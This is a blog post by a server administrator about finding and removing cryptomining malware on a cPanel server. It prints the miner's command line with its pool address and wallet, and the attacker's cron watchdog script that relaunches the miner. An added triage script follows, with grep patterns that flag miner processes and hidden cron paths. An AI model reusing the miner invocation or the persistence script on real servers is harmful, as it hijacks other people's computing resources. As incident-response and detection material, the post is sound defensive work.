
Cpanel server infected with mining software

11 September 2018 783 supporters 2 Comments

Recently one of the servers under my control was infected with mining software. It caused unnecessary load and wasted server resources.

Since the server runs cPanel, I used WHM to track down the source. I checked WHM's ‘Process Manager’ and ‘Daily Process Log’ and found something like this:

impxxxx impxxxxketing.com 98.5 -bash -a cryptonight -o stratum+tcp://xx.xx.xx.xx:14444 -u 4AmprS3UsK28LE9pHnt9TXDZygXoVtnQ6eFkD5ghP7TwPZ7tKkhQJn1Z3SUCbmw7xcA8F6pnQBpEzfQ2BGdTXo6BEs7MFHZ -p x

I used ‘Process Manager’ to kill the PID running the process.

I then checked the user's cPanel account and found a strange cron job pointing to a strange path, e.g.:

/home/impxxxx/public_html/nrxxxxment/includes/.qts/upd

So I read the contents of the file with the cat command:

[root@svr2 ~]# cat /home/impxxxx/public_html/nrxxxxment/includes/.qts/upd
#!/bin/sh
if test -r /home/impxxxx/public_html/nrxxxxment/includes/.qts/bash.pid; then
pid=$(cat /home/impxxxx/public_html/nrxxxxment/includes/.qts/bash.pid)
if $(kill -CHLD $pid >/dev/null 2>&1)
then
exit 0
fi
fi
cd /home/impxxxx/public_html/nrxxxxment/includes/.qts
./r &>/dev/null

Go to the folder and see what is inside it:

[root@svr2 ~]# cd /home/impxxxx/public_html/nrxxxxment/includes/.qts/
[root@svr2 .qts]# ls
a bash.pid cron.d dir.dir f g m p r s t upd x

The existence of bash.pid confirms that the mining was run from that path.

Delete the folder and remove the cron job, and the mining stops.

[root@svr2 .qts]# cd ..
[root@svr2 includes]# rm -rfv .qts
removed ‘.qts/f’
removed ‘.qts/x’
removed ‘.qts/cron.d’
removed ‘.qts/t’
removed ‘.qts/s’
removed ‘.qts/p’
removed ‘.qts/dir.dir’
removed ‘.qts/bash.pid’
removed ‘.qts/a’
removed ‘.qts/upd’
removed ‘.qts/g’
removed ‘.qts/m’
removed ‘.qts/r’
removed directory: ‘.qts’
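The steps above (spot the miner in the process list, check the user's crontab for commands living in a hidden directory under public_html, confirm the pidfile's process) can be scripted so the same triage is repeatable on other cPanel accounts. The following is an added example, not code from the original post; the process and cron lines it scans are constructed sample data (the pool IP uses a documentation range and the wallet is a placeholder), and the live `ps` invocation mentioned in the comments assumes procps-style options.

```shell
#!/bin/sh
# Added example: read-only triage helpers for the cryptominer indicators
# described in the post. Nothing here kills processes or deletes files;
# it only reports what an admin should look at.

# Constructed sample of "USER PID %CPU COMMAND" lines, as produced live by:
#   ps -eo user,pid,pcpu,args --no-headers
# The first line mirrors the shape of the process seen in WHM Process Manager.
SAMPLE_PS='impxxxx 4321 98.5 -bash -a cryptonight -o stratum+tcp://192.0.2.10:14444 -u WALLET_PLACEHOLDER -p x
mysql 1234 2.0 /usr/sbin/mysqld
root 2222 0.1 /usr/local/cpanel/cpsrvd - waiting for connections'

# Constructed sample of a user's crontab (schedule is made up; the path is the
# one from the post). Live equivalent: crontab -l -u impxxxx
SAMPLE_CRON='*/5 * * * * /home/impxxxx/public_html/nrxxxxment/includes/.qts/upd >/dev/null 2>&1
0 3 * * * /usr/local/bin/backup.sh'

# Print process lines that carry miner indicators: a stratum pool URL or a
# cryptonight algorithm switch. Reads stdin, writes matching lines.
find_miner_procs() {
    grep -E 'stratum[+](tcp|ssl)://|-a cryptonight|-o stratum'
}

# Print cron entries whose command lives in a dot-directory somewhere under a
# public_html tree. Web roots have no business hosting hidden executables.
find_hidden_cron_paths() {
    grep -E '/public_html/.*/\.[^/]+/'
}

# Convenience wrappers returning a count, so results are easy to assert on.
count_miner_procs() {
    printf '%s\n' "$1" | find_miner_procs | wc -l | tr -d ' '
}
count_hidden_cron() {
    printf '%s\n' "$1" | find_hidden_cron_paths | wc -l | tr -d ' '
}

# PID column of the first suspicious process (what you would feed to
# Process Manager or kill after confirming it).
first_miner_pid() {
    printf '%s\n' "$1" | find_miner_procs | awk 'NR == 1 { print $2 }'
}

# Liveness probe for a PID read out of a pidfile such as bash.pid. The watchdog
# script in the post used "kill -CHLD"; kill -0 is the conventional check and
# sends no signal at all.
pid_alive() {
    kill -0 "$1" 2>/dev/null
}

# Demo run on the constructed data (prints the two findings).
echo "Suspicious processes:"
printf '%s\n' "$SAMPLE_PS" | find_miner_procs
echo "Cron entries in hidden web-root directories:"
printf '%s\n' "$SAMPLE_CRON" | find_hidden_cron_paths
```

On a live server, replace the two sample variables with `ps -eo user,pid,pcpu,args --no-headers` and `crontab -l -u <user>` output, and repeat the cron check for every account on the box, since the same dropper is typically installed under more than one compromised site.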

2 Comments

  • kumail said:

    Do you have any idea how they infected the server in the first place? How did they upload the bash.pid file onto the server?

  • admin (author) said:

    Outdated script…
